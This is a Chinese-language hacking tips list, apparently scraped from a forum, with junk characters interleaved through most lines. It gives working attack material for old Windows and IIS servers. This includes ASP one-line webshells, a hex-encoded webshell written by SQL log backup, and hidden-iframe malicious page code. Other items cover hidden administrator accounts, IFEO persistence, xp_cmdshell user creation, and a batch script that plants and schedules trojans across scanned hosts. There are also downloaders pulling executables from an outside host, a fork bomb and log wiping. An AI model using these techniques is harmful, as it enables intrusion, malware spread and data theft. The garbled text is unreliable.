Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
0 F8 K7 k8 A. ?. z) e# A# hcacls C:\windows\system32 /G hqw20:R2 u# b; r) k/ N" _8 {% O
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
& W" d- W+ b0 `, A P8 m恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
4 s4 ~7 F# r/ R6 j- p1 A( u6 M- k1 a& E6 t/ X z
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。3 e/ ^" U ?* M9 `
' A' X! J; Y' e( Y- A( g0 v
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
8 O( c4 Z4 ^6 l' h( H: }5 m! r
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号7 S4 b9 F+ {' [+ j
4 }& b& ]- G9 c5 @. |6 q
5、利用INF文件来修改注册表
8 r U/ ~9 z H% a9 g6 s[Version]& e- I8 I( Y% h+ c! k
Signature="$CHICAGO$"
& Q' x; {0 ^ T! ?9 q, f[Defaultinstall]4 W* y8 k, G! b. X% x- y' T
addREG=Ating
: f+ Z# F; P/ ~- U2 {[Ating]' [6 S( i8 B- v* j4 ]
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1", B8 _8 o! n& F4 h% j9 y
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
7 O, e3 {( b0 t! f+ s2 V. Zrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径$ C9 ?! b7 h) y6 l3 G
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU0 I5 \5 p) J8 U- N- G! Q* U* l
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
$ P/ {9 J" L o* L% l/ X0 ZHKEY_CURRENT_CONFIG 简写为 HKCC i1 M# u- b6 l( ]5 h# V& F9 c$ y
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
. p& |9 e) q" w; Z"1"这里代表是写入或删除注册表键值中的具体数据" Q2 h9 ]0 J% M) K6 u' g& M3 U
" `0 Z( }; b) h V1 L, [# g& l6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,( {" m; d5 S1 J; ?: ?1 V' R" U( ^
多了一步就是在防火墙里添加个端口,然后导出其键值! D0 l; N2 o5 q) K. z/ i/ J
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]9 I" o. M2 q0 }* g
2 K( h3 S" l9 G% L# Z
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
2 S# [+ l7 R! a在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
. T# t2 x3 n! [4 y0 [. Q) G0 o: Z: p. D; Q0 l+ b
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
7 ~% P. o) |/ ~- c' ?5 u; `
1 H, }0 U8 A6 p8 G7 z/ u1 ]& s/ ]9 h9 c9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
! M: j# }- u( E" ^( _可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。' ~' m) v' T$ B0 ^+ A: [9 M
& s; C' C! y9 B8 G5 Z" R' M7 Y2 ~
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
; ?; j' ~4 @ v: f8 H' U. b3 D
9 F( G/ r2 ?/ \11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,, b$ x- d9 r5 d* A
用法:xsniff –pass –hide –log pass.txt
7 q2 ?9 B; y5 p, x' }- B0 J5 m6 i; R' y; A+ E
12、google搜索的艺术
4 x$ U2 Z7 w2 c1 h6 e& Q8 c搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
) s/ P" x* ]" Z. D或“字符串的语法错误”可以找到很多sql注入漏洞。 v5 _' n: H3 x/ `% m0 {
# Y) D0 V/ x2 M9 E6 F; ?2 @& j6 m13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。" i* |; n& f/ @9 t& s
9 s: {0 ~7 N0 f& U/ v* C
14、cmd中输入 nc –vv –l –p 1987
- G7 L9 N/ ]0 r& w9 X$ C做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
7 C% E/ C: l$ N* r4 }! x: q/ O$ V
( p( A' {. u @0 ~15、制作T++木马,先写个ating.hta文件,内容为8 O' z( ~$ o7 A* Y7 i- a9 B! y
<script language="VBScript">3 N3 v& T2 V8 |. p% p& W
set wshshell=createobject ("wscript.shell" )
( |% y2 t$ q U8 u o* ba=wshshell.run("你马的名称",1)* A2 y0 F- W! F) v
window.close( I* M$ a: o: D) x$ C# X, O
</script>
9 [# A0 v2 C0 I再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。; z* p. m9 F) l( t6 Y3 ]
- g5 O! ]* t; k$ E9 ?( p% c/ q
16、搜索栏里输入
8 S6 Q2 u) ]* z0 n: J, v7 K关键字%'and 1=1 and '%'='
: ~( X# @& J+ ~; c+ ], C关键字%'and 1=2 and '%'='
8 m8 F$ h. C7 i$ S% t; ~* P0 ^比较不同处 可以作为注入的特征字符% N; @' K7 S/ \6 G& ^
/ }! h, d2 |* q: @( k" M17、挂马代码<html>8 O Z: T# D) s) x. P9 v Q
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
; l# A, N o- m</html>
! q$ L; R% v+ q& I- L/ U$ `. C/ N" O2 N% ^) ?1 c+ N
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
7 M+ l! }- y0 T& q3 r8 u" l. ^net localgroup administrators还是可以看出Guest是管理员来。
$ y! |# b; \- ^
" g+ w: d7 b! m% D' {$ R- D19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
( d# c* A. B5 M" O1 [用法: 安装: instsrv.exe 服务名称 路径
; s6 D5 x; ~0 Z' ]' |, _7 m+ p卸载: instsrv.exe 服务名称 REMOVE
; X, R7 X$ Y: X7 R# Y" n4 T W( P% h2 J$ b$ V# C; D9 A$ f
u. w; {. G6 p2 `; H. U2 H21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
- f$ A6 C# _3 X/ |& s不能注入时要第一时间想到%5c暴库。1 w/ c! M4 Y8 x5 ^0 u
N/ g: w' l4 E22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~2 {& O, i% O' d% M$ d
$ u9 |/ S2 O* N1 s, N. K23、缺少xp_cmdshell时( P, U2 b% C; f* _
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
; G5 I8 T- d1 P$ Y" r假如恢复不成功,可以尝试直接加用户(针对开3389的)
1 y* P6 L! m5 K/ g1 v) B0 Y" u) S- jdeclare @o int( _: b. A8 ^* Q) n7 K
exec sp_oacreate 'wscript.shell',@o out
) y* J& V; o7 H8 B9 dexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员6 [, ]# z4 f& ]# ?* X F+ @
/ ]. w6 K+ I( c: e: Q' C24.批量种植木马.bat! }" F0 _: J. H
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
) R# ~" a$ j3 a0 \9 Mfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间& ]/ M- A0 A5 _) t6 S ^3 {
扫描地址.txt里每个主机名一行 用\\开头
0 H# ~' Z6 u4 e n( O
. ~, T N: D; z' D$ S25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。 u$ i* o8 @9 @' W
1 @. S$ N: S; c: t& E- l7 Y9 [: x26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
, I/ x- U" B$ s" _* U6 g7 a1 B将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下./ j$ M0 P& O4 z9 _( x
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
* M( {% `1 y* }
& J: ?& @$ H+ y8 u4 v) D: R27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP6 X! J S6 i+ T. ?
然后用#clear logg和#clear line vty *删除日志
* ?" V, a1 P# _! \, P6 r- o2 v; T
28、电脑坏了省去重新安装系统的方法6 h7 `8 ~3 ?/ ?5 |' o
纯dos下执行,% m7 G8 [2 K7 ?2 M$ c5 X
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config, L1 ^; O& \ I4 P3 a& A% L
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config {0 j |0 d6 b
" c; t+ A# U, Q$ V2 t29、解决TCP/IP筛选 在注册表里有三处,分别是:
y/ q6 e% Z0 B* R# K, I7 FHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip1 Q% g' w5 S9 m; Z z
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip5 `8 m$ `0 { `( |6 a/ m% f
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip, [3 f7 \3 Y7 y: L7 l
分别用
, u+ [( L" V3 s7 g! B* xregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip% D( ?6 V u1 |5 W8 L
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip: C' C; s6 M+ Y* W5 S# k) i
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip' @: c r6 _$ {0 Z5 a5 \
命令来导出注册表项3 }7 ^+ o. Z$ [* {: p
然后把三个文件里的EnableSecurityFilters"=dword:00000001,. L* ^1 Q+ m* q9 e% y. O
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
. }9 B$ Y& J$ uregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
6 \; y8 t6 Z! |- F: e0 K0 M$ Q: g8 X$ q6 g7 x
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
! X0 ?9 P& r* ]! gSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
4 H; E! R* X, x6 @' l: [5 |) t0 C2 j
31、全手工打造开3389工具
5 T$ I- l; f L. `( k. a! `! I打开记事本,编辑内容如下:
5 ^( x- W' e3 ~echo [Components] > c:\sql
- E; i8 D1 m0 G) u' Qecho TSEnable = on >> c:\sql! h. @2 o$ V- ^+ |+ @9 n) [# h+ `
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q7 t- T4 e0 j% W k m) d
编辑好后存为BAT文件,上传至肉鸡,执行" |- D, i; o7 X% i
5 ]* H5 ]8 O' j( G% Y( @
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马# f, V7 ` n- r. o1 a* s( X
6 |2 B. t( E2 M4 F) a1 V! x
33、让服务器重启 H" g1 M; s4 `& w3 D6 |) _
写个bat死循环:
& \; u- Q2 k/ @# k& A. o; O@echo off6 ^; V5 M* q2 e& I" o# C. D- K# _
:loop1
2 V% N5 N- H& \- f" wcls
8 a7 _ u6 o; c4 V2 `) q zstart cmd.exe
/ {, B2 v* b1 F, Z! X1 a' Bgoto loop1
" N- x) f' ~3 e保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
6 ` K% ^- V& q8 `, D3 W1 j/ J9 S& z: Z
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,( o8 c8 T: B l7 Q1 q* ~: a
@echo off4 q: w! L5 v6 P: ]! U
date /t >c:/3389.txt
8 Q$ F/ k$ [, y4 @3 ?time /t >>c:/3389.txt
& Z2 Z+ d5 k" q9 battrib +s +h c:/3389.bat
5 H! z, O, t5 @attrib +s +h c:/3389.txt
- d E$ c: V# G) Lnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
2 ?7 {2 U$ u: n2 ]; D3 U# F并保存为3389.bat; ?* x; x" L- T- S2 A7 t) g
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号1 N/ I: r; l- @; t
2 P+ O' ]# I. p g9 a* R+ }+ h35、有时候提不了权限的话,试试这个命令,在命令行里输入:& }: {% _" m) N! n/ a' Z# w
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
/ x7 F+ |: ? T- i. {0 u, }8 h3 W输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
! S& ~; I* P% e6 C+ m5 H l% p
( J* W! Q; f4 ^5 c1 w7 D, E36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件/ S( s# M) |. ]) g
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
8 g J! t% Y9 d6 `6 `echo 你的FTP账号 >>c:\1.bat //输入账号+ H) ?+ a. l5 ~& M+ X7 P0 r3 A
echo 你的FTP密码 >>c:\1.bat //输入密码
- D$ c- |, @0 n! ]+ E- Oecho bin >>c:\1.bat //登入
" V! l/ h2 H$ H" T+ lecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么/ h. C! i" z( \1 z" b% T
echo bye >>c:\1.bat //退出
" |- ^' v& I2 d/ F然后执行ftp -s:c:\1.bat即可
) ^4 O8 Q2 R. M) \
. ?+ M' R1 c% b37、修改注册表开3389两法5 y% f& ^$ S1 P. y- q4 E
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表1 n" ]- }. h+ R" B$ \8 F& |
echo Windows Registry Editor Version 5.00 >>3389.reg
8 Y$ o2 \3 Q j# m% kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg) n0 @; f! j! C: m: v
echo "Enabled"="0" >>3389.reg
4 U$ T* _4 b3 i9 ^echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows* B5 v- o6 a% X9 _5 W# R3 S
NT\CurrentVersion\Winlogon] >>3389.reg
- C2 \# S- n2 R+ Oecho "ShutdownWithoutLogon"="0" >>3389.reg! |3 q3 C/ U' U) {! r
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]1 o; E2 ?; r* h' H
>>3389.reg
- N- J9 Z) Z* X3 kecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
. h, L/ |3 u7 K% Vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]3 U0 _3 A5 ]" F9 t" h/ f2 `
>>3389.reg
. B# D) ]) J" y1 B2 Wecho "TSEnabled"=dword:00000001 >>3389.reg7 u- T& Z( z2 n/ |$ C0 n0 |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg0 g5 R4 k- q5 a( c0 `8 |* C+ ^
echo "Start"=dword:00000002 >>3389.reg4 y9 ^% d' G X5 _4 p- z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
$ d# [$ u( U' n* t/ |>>3389.reg
4 n, z3 h/ x Q$ I1 P, g( Cecho "Start"=dword:00000002 >>3389.reg
9 l9 K6 M% Y5 T2 c6 m+ Aecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg+ U' `0 \" b& t, Z( v' U
echo "Hotkey"="1" >>3389.reg
, _6 B+ e7 ?. c4 P' oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal4 Q8 V& a0 O) `( A
Server\Wds\rdpwd\Tds\tcp] >>3389.reg! `; T, u5 ]6 l, i; V3 U" B
echo "PortNumber"=dword:00000D3D >>3389.reg
4 v* r+ j( F9 [- H' y! eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 E! r5 [8 S# N; X' d
Server\WinStations\RDP-Tcp] >>3389.reg' J2 Y" v6 C/ W4 }, J" V
echo "PortNumber"=dword:00000D3D >>3389.reg
% ?6 I* i) v1 b2 [6 Z把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
3 y4 `' |' E( k! }; z5 R0 n- a" L2 b(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)1 |& {. E6 i0 E, Q8 e; e6 C
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效/ Z: M- U$ b& V# f/ x0 o7 k
(2)winxp和win2003终端开启
) \* ]6 h. S% U8 j4 m, P用以下ECHO代码写一个REG文件:
@5 c8 j* w; Wecho Windows Registry Editor Version 5.00>>3389.reg$ f' y9 a2 u R! p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 D: m3 f5 s% N' v, x9 O7 @Server]>>3389.reg$ z, K* S3 S; ?8 `$ o5 G
echo "fDenyTSConnections"=dword:00000000>>3389.reg1 z* g) q% n. o/ `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- K5 m9 N- F* H3 p# P& u
Server\Wds\rdpwd\Tds\tcp]>>3389.reg2 ^& n+ M. ]+ O& }
echo "PortNumber"=dword:00000d3d>>3389.reg
: e9 _* V2 B9 i) n* E5 Uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 S: b/ v& S) F' o- sServer\WinStations\RDP-Tcp]>>3389.reg! f1 s7 }! y4 s6 E% L, d( Q: u
echo "PortNumber"=dword:00000d3d>>3389.reg' S$ W" ~, V. A4 v3 [
然后regedit /s 3389.reg del 3389.reg
/ Y1 D* k, s, o7 C9 @3 H% WXP下不论开终端还是改终端端口都不需重启
( V3 n* o7 F& Q; {
1 ?6 o- O8 ]: @+ o38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
( ~- |# |. n( u用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
7 `" F4 o$ l( {/ G
4 F* i! k4 K7 Q N39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!6 Z* J: h" ~% _- D5 E" t: E) b6 l
(1)数据库文件名应复杂并要有特殊字符% e) B( J# M$ t
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源2 E! X+ Y: i* ^6 |! I' X; T
将conn.asp文档中的
2 Q$ x6 i* O6 Z, _9 g' ^# BDBPath = Server.MapPath("数据库.mdb"), b4 T4 U) G0 X0 T- E2 A) P: U. T" p
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
8 Z9 e& @& |9 @' x: W8 m* ?2 S7 g9 `4 m& n! O, F# r
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
/ A9 q1 m- E6 w6 P/ n( f& N/ O(3)不放在WEB目录里
# {: Z" c( v, g5 E. [: q0 w: V6 @- l: E2 N
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉2 `* z# p* ^+ d
可以写两个bat文件8 \& f1 Q6 ?7 t6 x8 I9 W% F
@echo off$ N' M4 j" V5 a, u, Q9 o
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe. l; Y# h1 H; c q0 u
@del c:\winnt\system32\query.exe8 p) [, O* @" k# `. p
@del %SYSTEMROOT%\system32\dllcache\query.exe6 F! s: O; l1 ]& V
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的, N" I- L- [ v7 i1 V. p% K) {7 p2 ~
1 E! K/ ?: Y* Q! {@echo off
7 I7 |* a2 ~( A@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
! P$ d" l" N W: i5 h+ a: ?3 K2 P@del c:\winnt\system32\tsadmin.exe
/ M: e3 j0 ?9 B ~@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
J4 y8 W P6 l( n- F* S7 ]' u
4 k7 \& j/ ?, Y% d* I+ {+ Y( ]" ^41、映射对方盘符/ H0 h W! ]8 R& x$ I2 ]4 d) {
telnet到他的机器上,
/ Z0 R1 u g$ F1 j' `0 ^( \net share 查看有没有默认共享 如果没有,那么就接着运行* }% E% i& W3 k$ S4 ?: g
net share c$=c:7 o' M2 _7 h4 x! w
net share现在有c$' i3 F M- F" d" y$ f
在自己的机器上运行
: D) a- u ^5 jnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K9 ^$ J4 K7 h" ^8 b4 }- H
) ^! k: K; {: I9 ]0 U! { Y @+ P42、一些很有用的老知识8 Z5 s4 f- j8 Z8 I. h
type c:\boot.ini ( 查看系统版本 )
8 Q5 ]8 W( X8 \' T rnet start (查看已经启动的服务)) c! i( m" x& k. o
query user ( 查看当前终端连接 )
6 W1 |: }% _) b4 {% e! \net user ( 查看当前用户 )* a- W2 D8 F8 N; T& y
net user 用户 密码/add ( 建立账号 )+ [) m% `3 {! E: E9 f# j4 f+ {
net localgroup administrators 用户 /add (提升某用户为管理员)
+ m# L3 t7 {9 L& U" m! Iipconfig -all ( 查看IP什么的 )2 O% _; Z& R+ E/ H% c) I# C
netstat -an ( 查看当前网络状态 )
3 G; {% H' X! H) m# ^) F/ B/ dfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)9 S! y# g# k! i e
克隆时Administrator对应1F4
8 ?" q: v% ?, M2 z$ J9 Pguest对应1F5" _3 c( r5 a# [. |0 ~
tsinternetuser对应3E8
7 k+ W" a- J7 ?! h0 R
8 r/ S r f8 y* H" X43、如果对方没开3389,但是装了Remote Administrator Service+ X- _+ _4 i0 h/ @5 R3 k
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
: @) D$ o9 L0 Z% e+ t2 Z解释:用serv-u漏洞导入自己配制好的radmin的注册表信息" M& k7 k/ R: T0 K( H( n" ]
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
+ f" ~) d3 _( I
- Y- _/ T& [3 u8 i+ v44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
( G9 P1 B( t3 n3 `0 c8 D本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
& b$ ^5 o+ ]' ^% @ |! h" K8 `* M* z! O" r8 L
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
+ |0 X( `! \3 p# o3 oecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open2 F' O* }1 n6 O9 H( w1 s: ~
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
; h4 g: v4 X1 L$ U" d9 YCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
( r( v- D3 p/ E E" w, R2 v1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
) L* z* l2 \3 P$ {% H8 M3 h(这是完整的一句话,其中没有换行符)
( L' N3 t: r. p# Q. X7 n然后下载:, W6 c7 |; L3 I8 W) n
cscript down.vbs http://www.hack520.org/hack.exe hack.exe- y. q8 ?8 O( h# w4 p* z
+ x. b$ W3 F( ]& E+ D2 y
46、一句话木马成功依赖于两个条件:
- m2 r* @, [" V* }. H; {' F' O1、服务端没有禁止adodb.Stream或FSO组件
: O5 K5 l6 f2 L4 p2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。, a" J1 A$ v! f" F1 M; U3 o- u
$ Y5 ^9 Z( v; k9 ~; U
47、利用DB_OWNER权限进行手工备份一句话木马的代码:/ F; |2 o) o/ f3 y1 W% a
;alter database utsz set RECOVERY FULL--4 t+ U- L: x3 i- ]! s( r
;create table cmd (a image)--. M. {1 f% r+ J6 R6 @
;backup log utsz to disk = 'D:\cmd' with init--
# F% I9 g. Y- M% U2 K( b;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
+ H4 n1 B7 | b3 g;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
5 O. ]/ K6 c! L9 p {9 I2 _, o0 ?( k# b注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。$ c! B) }: o& G' B" M: \5 D' T
- `7 y. ] I$ I! i! \
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:/ A' _; D% B/ O; w0 O
8 C; S+ ?, e: h- u/ r7 A用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options1 ]$ `; A2 s* ]: Y. R6 [$ m1 {, o
所有会话用 'all'。 ^3 b( I7 J& T
-s sessionid 列出会话的信息。- a1 I1 K2 z2 W$ R. m+ M6 z- A
-k sessionid 终止会话。; e. ` i2 r& W' F
-m sessionid 发送消息到会话。6 h" p" B3 ?( y% c( T9 ~
( {5 e& e0 i& S$ v7 a+ iconfig 配置 telnet 服务器参数。, \, x4 j8 s D/ J3 `) R0 M/ W! p
$ v9 U- i7 E* \
common_options 为:& \' U9 y" ^0 c+ r+ l6 m3 u
-u user 指定要使用其凭据的用户
7 V7 A7 c ~- E7 h7 l-p password 用户密码" E3 ~) _& }' I! B A& V
9 a& w3 ~: }1 }* H$ Pconfig_options 为:
, S" Y3 Y0 p2 Y: i2 s" t$ Ddom = domain 设定用户的默认域 F! W! p) _* _+ K( {7 Z
ctrlakeymap = yes|no 设定 ALT 键的映射* Z. k( x% ^ ]' Q9 ^. K) Q$ N* |
timeout = hh:mm:ss 设定空闲会话超时值$ @$ T9 S- {7 _8 Y. f1 k( J4 Y% Y, N$ M
timeoutactive = yes|no 启用空闲会话。& b! ~. d2 x8 R0 R9 o% x3 K% D
maxfail = attempts 设定断开前失败的登录企图数。# p9 b/ y+ z+ Y# k
maxconn = connections 设定最大连接数。; a: E9 J: C- ]7 u
port = number 设定 telnet 端口。2 E' {8 g7 w# X8 x5 Q8 M, K: w
sec = [+/-]NTLM [+/-]passwd, G p+ a2 }8 A: r
设定身份验证机构; p. P: \- ~) T+ N$ n3 }' z
fname = file 指定审计文件名。
% R3 B* R( K3 [ hfsize = size 指定审计文件的最大尺寸(MB)。
9 G$ ?6 o- [5 [* f8 M j% s/ bmode = console|stream 指定操作模式。6 L$ M2 s: s1 v& d8 \, Z P
auditlocation = eventlog|file|both+ c+ c& T; a1 X
指定记录地点' Z) R: Z1 D( b+ s6 k: _' Q( |
audit = [+/-]user [+/-]fail [+/-]admin
* |; Y* i, `9 _ H4 y; ]' d) M0 G8 \( h7 V
49、例如:在IE上访问:
2 t$ T1 [7 V$ Y6 G f! R3 g4 _www.hack520.org/hack.txt就会跳转到http://www.hack520.org/' s- F! ?7 p* Q6 \& N& ]
hack.txt里面的代码是:
r+ j U0 n6 X) b<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">& k7 v9 X! q6 ]! |
把这个hack.txt发到你空间就可以了!
3 @$ I$ j [& g# E- M' U& _( M这个可以利用来做网马哦!
4 ~" p( R8 |( B# C* e+ ~4 z5 g' F. F7 K7 g% x
50、autorun的病毒可以通过手动限制!
6 L6 `7 B, r4 s9 Q1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
) Y/ s0 K2 c/ F0 d2,打开盘符用右键打开!切忌双击盘符~2 V: `1 [" y* w: |
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!' p8 n* M+ F/ C/ p: a1 Q/ A
9 i! ]2 A5 T; i: k
51、log备份时的一句话木马:2 k" y; _% V2 s( A. m4 }. c' ?
a).<%%25Execute(request("go"))%%25># M. @# A* V1 y% T* w
b).<%Execute(request("go"))%>9 y+ O, |/ H" S/ _) L
c).%><%execute request("go")%><%
4 J9 S& b6 \" Sd).<script language=VBScript runat=server>execute request("sb")</Script>
! l) M; R: N3 e2 r! k9 v9 O: b* M8 T9 L8 We).<%25Execute(request("l"))%25>
: `2 ]$ K! \$ [9 {) V7 {f).<%if request("cmd")<>"" then execute request("pass")%>( z: g# p. P2 R5 J" G
$ _ q# k! }/ h: C; Z( N
52、at "12:17" /interactive cmd! i: u0 F. d+ X6 t) E
执行后可以用AT命令查看新加的任务
